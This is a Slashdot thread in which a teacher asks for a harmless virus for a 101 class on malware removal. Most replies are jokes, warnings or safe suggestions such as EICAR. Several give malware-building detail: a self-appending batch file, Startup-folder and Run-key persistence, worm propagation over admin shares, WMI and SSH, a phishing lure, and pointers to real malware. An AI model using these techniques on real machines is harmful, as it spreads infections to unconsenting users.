Perhaps a better learning experience would be to connect the lab (or a handful of the students own computers) to the Internet, and stick a box running Snort (www.snort.org) with Emerging Threats (www.emergingthreats.net) signatures in between. If, by some miracle (or the fact that they're all Mac's) you don't have any immediate indicators of infection, then head on over to teh Googles and search for 'smiley tool bar' or 'free porn' with the I'm-Feeling-Lucky button. That ought to do the trick.

Get a full packet capture of the session so you can dissect how the virus was able to get on the machine, where it left hooks, how its similar and different to other types of malware, etc.

I agree that a review of a simple virus is a worthwhile endeavor, but perhaps that's best learned via a good book or whitepapers on the Internet. Save the demo for something that's relevant and 'live'.

And on second thought, maybe its best if you set up a demo machine to be infected. That way you can nuke it from space afterwards, just to be sure.

Virus Creation Laboratory?

[technos]

A friend of mine who taught at a community college actually did this back in the mid 90s. He took a copy of Nowhere Man's Virus Creation Lab and tossed together a couple annoying but non-destructive viruses and infected a few stand alone machines for the students to play with.

You can probably still find VCL out there, or a more modern DIY virus kit. Though with the new ones, I'm not sure I would trust they don't have any hidden functionality.

Simple way to get infected

[kelarius]

Just tell the students to go onto facebook or myspace an play every stupid little game or take every stupid little quiz in sight. Then, tell them to click on every stupid little "get a xxxxxxxx degree in weeks" advert they see, and download whatever is recommended on those sites. Find a suitably infected machine, create an image off that machine, and you're set.

I'm actually not joking, this is what I do when I want to play with whatever viruses are currently in the wild.

Re:How about...

[santax]

Dude this is slashdot. I skip the first 4 sentences and read the last line to sum it up for me. Besides, I wonder what he is doing teaching this if he has to ask this. Just install a damn virtual machine and play in there. Don't infect the lab that other teachers students need to use with a virus that you have to ask someone for.

An answer for your OP:

[RMingin]

You don't want an actual virus. Viruses are becoming less common, they are now the delivery vector more than anything. Most of my badware experience in the last year or three has been exploits, generally server-hosted and browser-targetting. Malware is the payload and payday, that's where the action is. Malware is also typically the user-facing component as well.

Go find Antivirus 2009, or the most recent respin of that godawful thing. It's fairly straightforward to remove, fairly obvious when it's present, and just aggressive enough against removal operations to be realistic. It won't self-replicate and spread, but it will give you a removable and obvious "infection".

Re:An answer for your OP:

[Pranadevil2k]

One of my relatives PCs got some really nasty malware recently that pretended to be antivirus software and would halt any action taken by the user with a popup saying the thing you were doing (Taskmanager.exe and the like) was infected. It implied you had to pay $30 to buy the 'full version' of the software to fix it, and the only way to pay was with a credit card. I have never seen a more aggressive piece of software and I had no idea how to fix it other than a boot from CD reformat. Scary stuff :\

Re:An answer for your OP:

[RMingin]

That certainly sounds familiar. It's most likely the newest variant. There have been easily a dozen major updates of Antivirus XP, they've been nasty to remove.

It *is* possible to remove it, though, and even without reinstall. The real trick is getting a wedge under it to start with, because it's very tenacious until then.

Re:An answer for your OP:

[cbiltcliffe]

and I had no idea how to fix it other than a boot from CD reformat.

Read the registry from another computer, and check all the spots where programs autostart.
Then check all the filesystem locations where programs start.

Delete anything that looks nasty.

Problem solved.

Windows is a virus

[isabellf]

As many slashdotters know Windows is a virus : http://www.annoyances.org/exec/show/article09-115.

Teach them to boot up a linux CD and reformat the whole thing, this is virus erradication!

Spend 10 minutes downloading porn!

[colman77]

you'll be all set! No, of course you won't get fired.

Easy web browser one

[zmaragdus]

It might be caught by modern browsers, but if you turn off all the security features (or just load up IE5 or something like that), you might be able to pull the one where you open an html document (with embedded javascript for the "virus" portion) and it, in turn, opens up two copies of itself. Those two each open two copies, and so on and so forth, until you've brought your machine to a screeching halt with the glut of windows opening up.

Easy to fix, too. Just manually shut down the machine (either hard power off or yank the cord), then delete the offending file.

Defining Malware first?

[garompeta]

I think that we should remember the original concept of a virus: self replicating code. A binary that continues self copying itself and infecting other programs by binding its own code to them.
A very simple conceptual and inoffensive "virus" could be a simple bat that copies itself with a >> to any bat file... something really annoying I made once was a file called: "glutton.bat" which had,
@echo off
echo Can't stop eating...
echo I just can't...
echo glutton.bat>>target.bat

As soon as glutton is ran, target gets "infected" with a new line... and when "target.bat" is ran, it will just keep increasing its size ad infinitum.
This is not executable and still explains the fundamental concept of how a virus behave.
Now, if you want to infect a network with a proper worm, that is another story and I think that explaining about exploits and autorooters is way out of the scope of a 101 class IMO.

Manual removal

Since you're looking for something the students can manually remove, why not just create a "virus" file that is really just a small file full of random data. Tell them the file is located in /path/to/system/files/ is N bytes in size and has a random file name. Then they can find and delete it. Then there is no risk, no explaining what you were thinking to your boss and the students get the basic concept of seek and destroy.

Re:Manual removal

[monkyyy]

no deleting sys files by hand is always a bad idea

Re:Manual removal

[cbiltcliffe]

Then what do you recommend for viruses that aren't yet detected by most antivirus software?
Just wait for definitions to come out?

No. You find and delete a system file by hand.

Re:Manual removal

[monkyyy]

id recommend linux ^__^

or sandboxing web bowers (or disabling ie),
super antivirus,
having the tools to fix the problem on hand,
and this on very hard to find setting that windows where it asks u if u want to allow each and every program access to u hd if it trys

Re:Manual removal

[cbiltcliffe]

id recommend linux ^__^

Not the point. We're talking about infected Windows systems, here. Once it's already infected, it's too late to prevent infection by switching to Linux.

or sandboxing web bowers (or disabling ie),

Web browsers aren't the only way machines get infected. You'd have to sandbox everything, which, while possible, certainly isn't practical in a lot of cases.

super antivirus,

Pipe dream. Now how about something that actually exists?

having the tools to fix the problem on hand,

which hasn't got a lick to do with whether you have to delete a system file manually or not. In fact, I'd say that the tools (Knoppix, WinUBCD, et al) to fix the problem are the right tools specifically _because_ they allow you to delete a system file by hand.

and this on very hard to find setting that windows where it asks u if u want to allow each and every program access to u hd if it trys

So, another recommendation of something that doesn't exist. Great.
Maybe your next computer will be secured by unicorns.

simple and effective....

[metalmaster]

Create a batch file with a shady sort of name

You can use a simple command like >> start iexplore -k "error.htm"

Use http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html to convert the file to an executable. Have your students run the file so that it opens the error page in IE kiosk mode.(Annoying enough to not have a "Close" button) Demonstrate how open windows can be tracked to their parent process(error.htm is opened by sh4dY.exe) from within task manager. Hunt down and terminate the offending process, delete the exe and maybe the offending web page.

Really Simple

[b4upoo]

If you wanted to teach students about viruses and had a Win 98 system or any system that has DOS you could do really simple demos. A nice sounding batch file with a format command would be a start. Once the students understand that even primitive programmers can create malware easily then you might show them some of the scripts that people plug into their own programs to cause devastation. Next might be to explain that advanced programmers and even governments can write really sinister viruses but that may involve years of learning. It might also involve years in prison.

So when students make a copy and it goes wild

[joeflies]

Who are they going to blame?

I can picture that bright, inquisitive kids (and maybe of the few bad apples too) get a hold of a virus and create a copy of it / upload it to a server / save it to a usb drive, and then it gets out and infects other school computers, then guess who's door they're going to knock on?

Yes, there's plenty of ways that kids can get virus code on their own. But there's a big difference between when a kid picks up a loaded gun from home, vs getting one from the teacher, and hoping that it doesn't go off in an unintended manner.

I once had such a class.

[cheekyjohnson]

It was filled with people who barely knew how to work a television remote, let alone use a computer. I think you might be wasting your time...

You're a lousy teacher.

[tomhudson]

"Demystifying computers" - teaching them how to remove a virus isn't going to do that.

Teach them how a computer actually works - if they don't know what's normal, how the heck are they supposed to recognize when something is wrong?

Besides, if they're too stupid to recognize what's normal by now (like they've never really used a computer before), you're wasting your time "demystifying computers." If they're too old, or too young, you're again wasting your time. Perhaps we should send you to Soviet Russia and have a virus remove YOU!

Re:You're a lousy teacher.

[guyminuslife]

Why?

Nobody's too old to want to learn new tricks. Nobody's too young for an introduction to computers (provided they have the motor skills to use one). Plenty of people get discouraged from learning things about their computers---like how to fix them---precisely because of that attitude. So they call up their nephews and brother-in-laws and don't ever bother with it: many are perfectly capable and intelligent people, but they never learn because they assume they'll screw it up. Which they will, if they never learn...

Your attitude is counterproductive and asinine. There are a lot of people I would like to send to a class like this.

Re:You're a lousy teacher.

You're a lousy asshole. You have no idea what he's teaching where in the unit he is or what understanding the students have, who are you to claim he's a lousy teacher?

Re:You're a lousy teacher.

[tomhudson]

"Demystifying computers" + "let me install a virus so that they can practice" == retarded.

The Giant Black Book of Computer Viruses

[equex]

Get 'The Giant Black Book of Computer Viruses' - old but I remember it had simple ASM viruses you could play with.

Re:DON'T DO IT! You'll get fired

[Stormscape]

RTFA, he's teaching them how viruses work and how to remove them, not how to write one.

I Like it!

[jeeribaldi]

This is a great idea for a intro level course. Not only does it teach about viruses, but about social engineering viruses - the ones that do no harm unless you "buy in" and follow the malicious instructions. Leave a cheap USB stick on their desks, or on the floor. It just needs to contain the self written virus and autorun.ini, those who plug it in fail, those that don't, pass - at least the first stage of the test. Then let them develop their own break-out groups to remove it from those student's machines that fail the first part. Great lesson! Very inventive and engaging! Make the virus like the one (I cannot remember the exact name) that infects machines by displaying a Microsoft Security Essentials message saying IE is infected, then tries to get you to download anti-malware software that actually is malware. My two cents ( of course my 2 cents are valued at rates from the 1970's, so through devaluation and inflation... whatever)

That virus will fail on Vista/7

if UAC is enabled, Explorer is not running with privileges that can write to the All Users profile.

For that matter, this will fail on any system where the profile directory isn't in "C:\Documents and Settings", which includes any non-English OS.

Use

copy installpopup.bat "%userprofile%\Start Menu\Programs\Startup" instead

Re:That virus will fail on Vista/7

[rwa2]

if UAC is enabled, Explorer is not running with privileges that can write to the All Users profile.

For that matter, this will fail on any system where the profile directory isn't in "C:\Documents and Settings", which includes any non-English OS.

Use

copy installpopup.bat "%userprofile%\Start Menu\Programs\Startup" instead

Thanks! I'm by no means a Windows guru, nor have anything other than my corporate WinXP box to test on :P

Re:That virus will fail on Vista/7

[CorporateDrew]

RWA2, I really like this example. It's instructional and non-destructive. This kind of example could be used in a simple scripting lesson earlier in the course regarding how simple software installation scripting works. I think you could defend this example against the "what were you thinking when you taught them this?" rhetoric (see above "DON'T DO IT. You'll get fired" thread).

Re:That virus will fail on Vista/7

[GF678]

That script will also fail if, like we do, Autorun is (sensibly) disabled using Group Policy. If it isn't then I'd go talking to your IT department as to why not. :)

Re:That virus will fail on Vista/7

French versions of Windows use "Program Files" and "Documents and Settings".

Re:That virus will fail on Vista/7

[rwa2]

If the only thing we do is teach these kids to become the kinds of people who disable autorun (or hold down Shift while inserting untrusted media), then we would have already made the world a slightly better place...

Re:That virus will fail on Vista/7

Nothing like getting good virus writing lessons from \.ers.

Re:That virus will fail on Vista/7

The UAC issue aside, a brief comment on the localization thing: this might fail in Vista, but it might not fail in 7. The fun thing in 7 is, these directories are only localized on the UI level and no longer in the file system. "c:\Document and Settings" does indeed work on my German Windows 7 instance, so does "C:\Users", etc. etc.

My CSI teacher did something similar...

Demonstrated how someone is murdered. I was glad I didn't draw the short straw to be the victim.

They're now serving life.

Use semi-current infection location to be worth it

[likuidkewl]

So with this type of example in today's computing world, I would suggest a simple program that is autorun at start say in the registry under windows/current version/run or the like. it could write a copy of itself to the temp folder and check every 5 seconds to see if the key or file has been modified/removed. This can all be done easily with say a vbs/batch/pshel script.

example location:
HKLM\software\microsoft\windows\current version\run\

Just keep say the main copy in %TEMP% and try to keep persistence in the %windir%.....The possibilities are endless

and using $ for variables was awful i will $variable any day!

If I effed up the Windows registry locales, sorry. I don't use windows much anymore.

Re:DON'T DO IT! You'll get fired

Wow you have no reading comprehension do you. Re-read his question. He wants a virus that HE can infect computers with. He is teaching virus removal, not virus writing.
He says he already has a isolated lab just for this purpose.

Perhaps you should learn to understand what you read before you post and make yourself look stupid.

Re:DON'T DO IT! You'll get fired

[hoggoth]

Sure... he is teaching his computer newbs how to WRITE a virus in a 'demystify computers' class. And next period in health they will be designing the DNA of a retrovirus.

I can't be the first to suggest it, but...

[kenh]

Have you considered installing Windows?

Seriously, there are 'fake' viruses that are used for testing - really just a block of code that matches a virus signature, have you considered one of those? For example: http://www.eicar.org/anti_virus_test_file.htm (as others have mentioned).

Bad idea

[FlyByPC]

This sort of thing is exactly what the "whatcouldpossiblygowrong" tag is for. I'm surprised it hasn't shown up yet...

Maybe ask a clamav virus signature author...

[mrflash818]

...if they know of a good virus candidate?

http://www.clamav.net/

Not a virus

[microbee]

This is not a virus. A real virus would replicate itself, which means when it detects an USB drive it copies itself onto the drive.

If I were the professor you'd get a FAIL.

Re:Simple

[beav007]

Protip: Windows is not a virus, because virii by definition are self-replicating. Computers do not spontaneously break out in Windows.

Windows fits better under the heading "malware" (or "crapware").

Actual answer

[dakkon1024]

Actual answer 1) You should write this yourself 2) How the virus is going to spread depends a lot on the lab you are working in. You best hard code the “infection” by name or ip. 3) You will need some form of admin rights. 4) Create Virus. 5) Give it to your class. 6) Infect PCs 7) Somehow this will go horribly wrong. 8) You will get fired.

Re:DON'T DO IT! You'll get fired

He's planning to intentionally infect the school network with a virus as part of a lesson. Sounds like something you get fired for.

Do you run SCADAs ?

If so, the virus will come to you...

lol Monkey.b ! memories..

[gearloos]

This so reminds me of Monkey.B which was a virus running rampant years ago on DOS machines. If you can get an old box, load dos or win95/98 on it you can dload Monkey.B and it will be easy to see. Just go to BIOS settings and your hard drive size chs will all be changed. Simple removal as well.

I'm not sure but you could probably make it easily

Idk, but you could probably make something that has an animation and locks everything up or something.

Easy

Just install Windows.

Does your institution need any more clueless instr

Seriously. I'm available.

Re:I suggest using a jpeg

I know not to feed the trolls but that was fucking hilarious. That is all.

write it yourself

[jamesh]

Write it yourself. The fact that you would even consider this without thinking about the potential for it to be a serious Career Limiting Move means that it should be a fun ride :)

Seriously though, install XP at some base service pack level - sp1 or sp2 might do, then connect it to the internet without any firewall. The viruses will find you.

But you could have a bit more fun than that. Write an exe file that simply pops up a "if this was a virus you'd be pwn3d by now" message. Then pick one of the popular kids in the class (lets call her Jane Smith), and send an email around to your whole class from an anonymous hotmail account (or some service that allows sending exe files) with a subject of "Ha Ha. Look at what Jane Smith got up to last night." and include the exe file with a message "pics attached". Fail everyone who opens it. You'll probably still lose your job due to the idiots they put in power, but at least you'll have taught your class a lesson (the lesson being "if you're a teacher, it pays not to think for yourself".)

You don't say what the age of your students is. If it's a university or TAFE level class you might get away with it, but you only have to offend one daddy's girl and it's all over.

This might work

[CobaltBlueDW]

I believe this is the url of the last virus I obtained: www.opengl.org/documentation/red_book/

I'm pretty sure it's a legitimate site, so the virus may have come from an ad, in which case there isn't a 100% chance that going to that sight will work, but if it does that would be a good option. It delivered one of those obnoxious and ironic viruses that had pop-ups pretending to "detect a virus". It was a trojan, but it was easy to clean-off by hand, it was an older virus, so all anti-virus software should find it, and the location the virus is linked to was shut-down a long time ago, so it is low risk.

Remove by hand?

[Culture20]

Hand them an OS installation CD. Tell them how once a machine is owned, you don't know how far, so back up data and restart from scratch. Done.

Virtual machines

[Volkov137]

Just get virtualbox on each of the machines, install windows (don't bother activating' just take a snapshot after install), then start being very irresponsible and click on every banner ad you see. Also, see if anybody still uses kazaa and start searching for...anything really.

Safer approach

[negatonium]

This might be a bit safer way to go: Antivirus software is sometimes tricked with false positives. I don't know what virus scanner you have on your lab machines but you can do a web search and find legitimate, harmless software that will trigger a false alert for whatever you have. Download one of those and use that to demonstrate to your students.

I assume since you say its a 101 class that by "remove by hand" you mean by using an anti-virus program and not hacking the registry. If so, then a harmless program will work as well as a true virus/worm.

I use McAfee and it alerts on a CD eject task bar tool I once had. It thinks it is a trojan joke program (I guess to make you think your CD drive is busted). That would make a fine demonstration and a good example of don't blindly download every "cool" program you see on the 'net.

Re:DON'T DO IT! You'll get fired

This is why we have 'lab' environments.

Re:Simple

"Protip: Windows is not a virus, because virii by definition are self-replicating. Computers do not spontaneously break out in Windows."

Are you sure about that? Because I'm pretty sure computers broke out with the Windows flu back when Windows 95 hit, and it's only got worse since then.

Oh, and just say "viruses." None of this "virii" bullshit, which is actually not correct anyway. Not to mention it sounds retarded.

Re:DON'T DO IT! You'll get fired

[Luke+has+no+name]

>Let's not do an instructive simulation of a common computer anomaly, lest some tech-retarded administrator punish you for being a good teacher.

Linux (I'm serious...)

I know, I know--Linux is rarely targeted by viruses, though they do exist. But, I recall reading about a proof-of-concept virus that was, shock, designed for Linux. Want easy to remove? Ironically, this virus makes it easy to remove itself from all infected filed by simply typing a command, such as "virusname --disinfect" or something like that. As for the name of this virus, unfortunately I can't remember, but someone else might.

Of course, then again this might be *too* easy to remove if intending to teach people how to remove a typical Windows virus, but hey... you never gave any limits on ease of removal.

Use some VMs in a virtual network

[nedlohs]

and please don't ever try and teach a medical class

Create the virus yourself

Ok let me understand this properly.
You are teaching a class on computer virus and you dont know how to create one yourself?

MBR virus

[pbaer]

Create a virus that overwrites the MBR making the computer non-bootable.

Re:DON'T DO IT! You'll get fired

[gringer]

No where was it mentioned about creating one. Ever.... actually read the summary ffs.

I think you may have missed this part of the summary:

do I try to write one my self

Simple...

[tompaulco]

The answer is simple. Find the person in your class who is smarter than you (you should recognize him/her. You were that person when you were in school), and give him the chance to shine that the a-hole professor never gave you.

Re:DON'T DO IT! You'll get fired

[Delarth799]

He wants to infect some computers in a lab, that's why the virus cant be one that spreads to other computers so he doesn't infect the whole damn network. Now sure the best thing to do would be setup some computers on just a local LAN that doesn't have any access to the school network but that might not be an option.

back orifice 2000 is pretty simple

back orifice 2000 was pretty simple to infect and remove... you could give that a go.
website here
http://www.bo2k.com/

last supported OS was windows xp, not sure on vista or 7

Re:DON'T DO IT! You'll get fired

[Aranykai]

Not illustrate, demonstrate. Which, while I don't share the extreme views of the GP, I think is likely to come back to bite you. These people don't know what a script is, showing them a "psuedo-virus" isn't going to substantially enlighten them, nor enhance their lives in any meaningful way. Move on to useful things and spend more time on those.

Core Wars

[meburke]

Cripe I'm old. I remember when writing a worm was an AI project. I also remember when air was clean and sex was dirty. It was all a long time ago...

Give them something entertaining and instructive to do: Introduce them to Core Wars. Modern viruses have little or nothing in common with EICAR any more. You could introduce almost all the concepts of a Comp 101 class through good Core Wars competition.

Re:Core Wars

[k2r]

Wow, I guess I didn't think of Core Wars within this millenium, yet.
I have something fine to play with during the holidays.
Thank you very much!

siemns

[ltcdata]

1: Install a siemens PLC in computers 2: connect to the internet the network 3: wait for sutxnet to infect 4: profit??

SM177Y

Install spyfalcon. It will spread through the entire network. Gotta love them rogue virus' :P

a single exe would be easy to remove

google netbus

Re:DON'T DO IT! You'll get fired

[axismundi]

I wrote a virus in middleschool (Windows 3.1 and DOS) which I showed to a friend, who infected some girl's computer. Turns out her computer belonged to her dad's small business. The ensuing shit-show of confused administrations, criminal charges, civil threats and pissed parents ended with a restraining order on ME and apparently some trouble for the "exploratory program" administrator, who at some point allowed me to use a computer, though it was most certainly not in any way involved with my extracurricular activities. Never underestimate the ability of an organization such as a school to dish out punishment on the wrong people. I agree with the parent poster, steer clear.

Re:DON'T DO IT! You'll get fired

[Reteo+Varala]

I think you may have missed this part of the summary:

do I try to write one my self

Keep in mind, he's trying to find a way to get the isolated network infected so the students can learn about removal. One of the options available, to those who are skilled enough, is to write one. Even in that sentence, I do not see any hint of a plan to let the students try to write one, or even see the source code to the theoretical virus. He simply wants a relatively harmless virus to use for the purpose of teaching how to deal with them. I believe some can be found at http://offensivecomputing.net/ although you need to register before you'll be able to get any.

Yes, please read.

[meerling]

What you want is called EICAR, it's known as a test virus.
It's not an actual virus, but antivirus programs will detect it as one, that's what it's purpose is.
EICAR doesn't actually do anything, so nothing is as risk.

Now as to the warning:
DO NOT UNDER ANY CIRCUMSTANCES USE A REAL VIRUS!!!! IT WILL GET LOOSE AND CAUSE PROBLEMS IF YOU DO!

You're dealing with noobs, and even if you weren't, it would still get out and cause problems, and that's assuming that you aren't someplace that would consider you liable, or worse, in possible violation of law for intentionally infecting computers.

Is all that alarmist? No, I've actually done a lot of work with viruses and their removal, and that includes work in an actual virus lab with real viruses. The only way to virtually guarantee a safe situation is a blackbox room. Nothing electronic goes in or out. No usb devices, no computers, no disks, no wireless, no network connections, no psps, no digital cameras, absolutely nothing. I don't think the school would be willing to pay for something like that, and to be honest, I don't think it'll work with computer 101 students as they just wouldn't understand.
You have no idea how many "isolated computers that nobody has access to so it absolutely can't be infected" are actually infected. It only takes one mistake, unknowingly or otherwise.

So just use EICAR and give your students a thrill without any risk on your part. It's better for everyone. After all, if you were teaching gun safety to some kids that have never seen a gun before, would you hand them loaded uzis?

Virus

[Dthief]

just have all your students look at porn on the computers for 1 day's lesson, then the next day the computers will all be well infected

Definition of terms

[spidr_mnky]

There's a lot of nitpicking about what is or is not technically a virus. The common use is to mean any piece of software that is malicious, but I assume you want something specifically benign. So, that leaves the question of what "type of virus" you want to emulate.

I saw someone mention demonstrating the autorun feature with a program that installs itself and sets autorun. This could give an opportunity to demonstrate how to delist such processes from the startup routine.

Do you want something that spreads? That could be thin ice, as well as being more difficult to do yourself, since it would need to take advantage of a vulnerability or misconfiguration.

You might find something they'll enjoy, like a game, and piggyback a do-nothing "trojan" with it. Give it to a kid you can count on to play it during class, as well as share it with his friends, and tell him not to play it during class. The payload of the trojan should execute during class a few days later. Maybe just pop up a dialogue every 30 seconds indicating the "infected" state, or maybe something with a little more pizazz,like setting a jolly roger desktop background. Then (after making a note of who ended up "infected") you can start the lesson on security, trusting executables, autorun, startup processes, etc.

The kids might (or might not) think you're cool because you wrote a virus, but as has been mentioned, higher ups might not. I would keep the phrase "It's not really a virus" on my lips the whole day.

DETER Testbed

[youngcho]

You should look into using DETER Testbed for this type of class. http://www.isi.edu/deter/ In short, DETER is an Emulab clone for Network Security type of experiments. There is an on-going effort to promote DETER for education purpose and the DETER team has access to several types of virus. https://education.deterlab.net/ Hope this helps. Young

I wrote something that might help...

[loosescrews]

I wrote this a few years ago. It is pretty evil, but does not cause any permanent damage to a computer. All it does is add a shortcut to the remote reboot command to the startup so when a user is logged on, the computer reboots. It can be easily removed with msconfig in safe mode. The cool thing is that most Anti-Virus programs ignore it.

You can download it here, and the removal tool here. I even made an iso that when inserted into a computer with autorun enabled, silently installs the program. The exe's were made with NSIS.

A simple buffer overflow ought to do it.

[AllergicToMilk]

Why not teach a simple buffer overflow exploit? A simple bit of C code with a scanf into a fixed length character array is your starting point. Have them craft a string to input that overflows the buffer and does something identifiable.

honeynet project challenges

[NicenessHimself]

The excellent honeynet project has some exciting challenges - examples of viruses and hacking in the wild, well packaged. The old 'Forensic challenge' is perhaps the most exciting for students to do: http://old.honeynet.org/challenge/index.html

Re:honeynet project challenges

[NicenessHimself]

and the honeynet project's new website with newest challenges is at http://www.honeynet.org/ strange that they have an old and a new site, with no links from the old site going to the new site... but an excellent project anyway! everyone should go enter their new challenges

Re:How about...

[phyrexianshaw.ca]

you ever worked in the education system?

the itinerary for ANY level of education all the way from grade four to a doctorate course in a university for computer sciences:

1) Computer Sciences.
1.a) Microsoft Windows. (if funding was provided by MS.)
1.b) Unix security
2) Programming
3) Keyboarding

and that's honestly about it. on a sheet of paper, with the school's letterhead at the top. if you're LUCKY, they might have what has been taught there for the last several years.

teachers today have almost complete control over what they teach, in most districts.

Not simple, but widespread and easily obtainable

http://www.amazon.com/Windows-Vista-Ultimate-SP1-VERSION/dp/B0013O77GM/

From my 2 years as a HS lab monitor

[GodfatherofSoul]

I consider this a pretty bad idea. A terrible idea. I commend your efforts to think outside the box, but anything you give or show these kids is bound to show up somewhere it shouldn't be. It's been my experience that study at this level of security is in the purview of much more advanced students who can truly understand what the code is doing and handle the responsibility of that knowledge. Your students will gain much more from a focus on productive coding rather than exploits. That's not to say that there isn't the oddball guru in your class or among this article's Slashdot readers who could handle it without a hitch. But, at their level the cost/benefit just isn't worth it.

Metasploit

You could use metasploit : it's not a virus strictly speaking, but it is a framework to research exploits. With an unpatched xindows XP machine, it could be useful in such a course. You could at least use it to teach the "how do i get malicious code to execute" part.

What could possibly go wrong?

[pr100]

You want to teach a bunch of kids how to make computer viruses? :)

write a shellscript

[k2r]

if you really want to demonstrate something self-propagating, write a shellscript that uses ssh with a special user and public-key authorization to copy itselself to remote machines.
Generate a ssh-key just for this purpose and copy it to the target-machines.
It's more a trojan than a virus, but don't feel tempted to make it more stealthy (naming it 'ls', changing target's $PATH), that's too dangerous.

And before this, if you are in the US, talk to your lawyer and check brainless zero-tolerance-policies that might be applied to you.

Symantec trial version

That will give them a challenge..... Oh, wait you said easy to remove, My Bad!

NetBunny

[macmurph]

About 17 years ago we had a hack called NetBunny that would send the energizer bunny from one lab computer to the next. It ran on classic MacOS. Apparently it was updated to 'NetBunny 2 1/2'.

An OS X port came out called NetBunnyX.

Now I can't find much info on it. But it definitely had the feeling of innocent, kid friendly malware.

What I would like is a safe site to demo fake AV

[maxwells_deamon]

I would like a site on the web that would act as a fake AV site. Like the ones when you browse to it pops up a message that you are infected....

I could probably set something like this but if it became popular people would try to convert it to the real thing and I do not have the time to monitor that juicy of a target.

Re:DON'T DO IT! You'll get fired

[L4t3r4lu5]

Yes, because he wants to make sure the "fake" virus he uses for the removal exercise doesn't contain some hidden, actually damaging, payload.

Someone has already suggested the EICAR test file, which is ideal. It pops up a message box, and is easy to remove. He can add links the various windows startup files, the registry, he can go old school and call it from a batch file, and he's safe in the knowledge that he's in no danger of hosing his systems.

Nowhere in the stub did he say he was going to teach the kids about actually writing the virus they were to remove. Reading comprehension fail.

Re:DON'T DO IT! You'll get fired

Bah!

I was creating test viri (is that the plural?) when I was 18 to see if I know enough about x86 ASM. Although I will admit that I did not infect more then 2 or 3 computers since I was not out to cause harm.

Those were the days ...

Now get off my freaking lawn!

Source Code Virus

[n01]

I recommend you find some source code virus, one that finds a source file and copies itself into the source file... While it has to rely on somebody compiling the source in order to spread (if it is written in a compiled language), this is easier to understand and analyze (and remove!) than a "binary virus"

rbot or conficker

[thrko]

I can give you a copy of rbot, that I used in a basics of malware analysis workshop. It connects to the botnet (irc server, domain name under your control), where it receives further instructions from botmaster (scan, ddos attack, upgrade, etc.). The bot itself isn't very sophisticated, no rootkit protection, just copies itself in system folder and makes an autorun entry in registry. Other option is A or B variant of conficker, you can get it on http://www.offensivecomputing.net./ Once you understand how it hides itself, it's quite easy to find it and disable it.

how to write teh virus???

[rve]

On any tech forum, including slashdot, you have wannabe haxx0rz who ask "how to write teh virus???" They never get a serious answer, obviously.

The OP (ed1023) thinks he can trick slashdot readers with some social engineering into thinking they're really helping someone this time by telling him "how to write teh virus???". Who knows, maybe he will succeed. Maybe he will write teh virus.

This is the way I would do it

[ancient_kings]

I'll assume your school has Windoze installed on the lab computers: 1) Leave your computers on the network to keep your virus updating software up to date. Why? Because students are going to place in USB drives/devices/etc that may be ALREADY infected. Trust me on this. 2) Make sure the students' accounts are NOT administative accounts 3) Install a free virtual PC system, like's SUNs Virtual Box 4) Install Windows98 in the Virtual Box System. 5) Look for a virus that existed BEFORE 2002. Some current viri can actually penetrate Virtual Machines (VMs), and if you think you are a smart pants and install a VM inside a VM, these viri can penetrate right to the main, "real" OS. Viri before 2002 are very likely unaware of VMs. You can get the Virus list from Nortan (SYmatecs) websites. 6) Now the tricky part. Finding the original virus source from a "reputable" website. :) 7) Copy source into VM, compile and run. 8) Have fun!

not an executable, but useful for explaination ?

https://www.cs.bris.ac.uk/home/page/teaching/wics/chap_virus.pdf

Virtual Machine + Live malware = good demo

You could just get a live one off offensivecomputing.net and infect a virtual machine. Just make sure to not connect the vm to a physical network if ur working with worms.

easy task

Assume you have write permissions to the all users dir, then write code that copies itself there.

Assume you have admin rights on all machines, do an arp lookup to find all machines on the network, and copy the virus itself to
\\machine\c$\Documents and Settings\All Users\Start Menu\Programs\Startup

The virus needs to initially sleep for x seconds (until interesting info is in arp cache) before it spreads.

You can also use the machine names of remote mounted shares.

If you want AV to detect it, include the Aicar virus in the file.

Should be easy to code in the not so good Perl clone Powershell

try vbs

how about some vbs virus ?

If your runnning windows,
1) retrieve PC names in network neighborhood (or trough active directory)
2) copy itself to start run menu
3) print a popup anoying
4) try to launch remotely on a random pc ( through wmi remote execution )
5) goto 1

if you go from 1 to 5 find the code for these small peaces trough google there are so many websites about doing administrative tasks trough vbs
i dont include the code itself, dont want to cause trouble.

As an alternative if you dont like to code; buy a SIEMENS PCL management unit, together with stux.net. :)

Erm... You're at a school, right?

Best bet, copy something onto a USB stick from one of the school computers. Plug it into a machine that hasn't been used by a child and has decent anti virus on it.

I can pretty much guarantee you'll get something

Blind leading the blind

Why are you teaching computer Science when you obviously don't know what you mean by a virus?
Don't our students deserve better.

Don't even think about it

[Confused]

Don't even think about doing this, there are many worthier subjects to demystify. You should stay away from this project not out of moral reason, but out of practical reasons.

Remember that teacher who gave the terror planing assignment recently? I think it was a very instructive idea, but he caught a lot of flack for it. Writing a virus is similar. Even if it has pedagogic merits, it looks really bad for you from the outside and it's very easy to condemn you for it. The risk isn't worth it.

On a technical side, writing a virus becomes very quickly very technical. You have to mess around with executable formats, hooking into loading procedures and many other internals of the target system. Add to that the who;le mess of payload, how to exploit systems etc. Those things are very boring and obscure to students who don't have some advanced understanding of the operating system. You're going to lose your students very quickly or spend an enormous amount of time to explain the basics for little gain. Better use the available time on better projects.

A virus is hard to contain. In the dark age of PC computing, a few virus escaped from lab settings exactly how you described them and became very widespread. Also, tracking how infection works isn't that easy either.

On the other hand, if your lab has proper security your virus might not make it far at all and fizzle at the first hurdle. Not very instructive either.

All in all this brings me to the conclusion, that your idea has more short comings than merits. If you want to have a project about computer security and malware, consider doing some network traffic snooping with Wireshark and what that stuff means. Looking at http packages compare with https, password logging, one time password systems with tokens, PIN-code skimming, password strength brute force attacks an etc. Add in a little data mining, social engineering and you're quickly in the domain of spooks and spies, but you still can safely declare it as instruction about security and privacy. There's a lot immediate hands on there which even your grand-mother understands.

Why the do-it-yourself approach?

You know, you could just ask a commercial anti-virus vendor if they'd send someone to your school, or give you and your students a tour of their lab. I'm sure you'll find one willing to do that if you try hard enough.
You might even end up with free promo CD-ROMs of their product for your students. :-)

Maybe a Modified Kentucky Virus

[phreed]

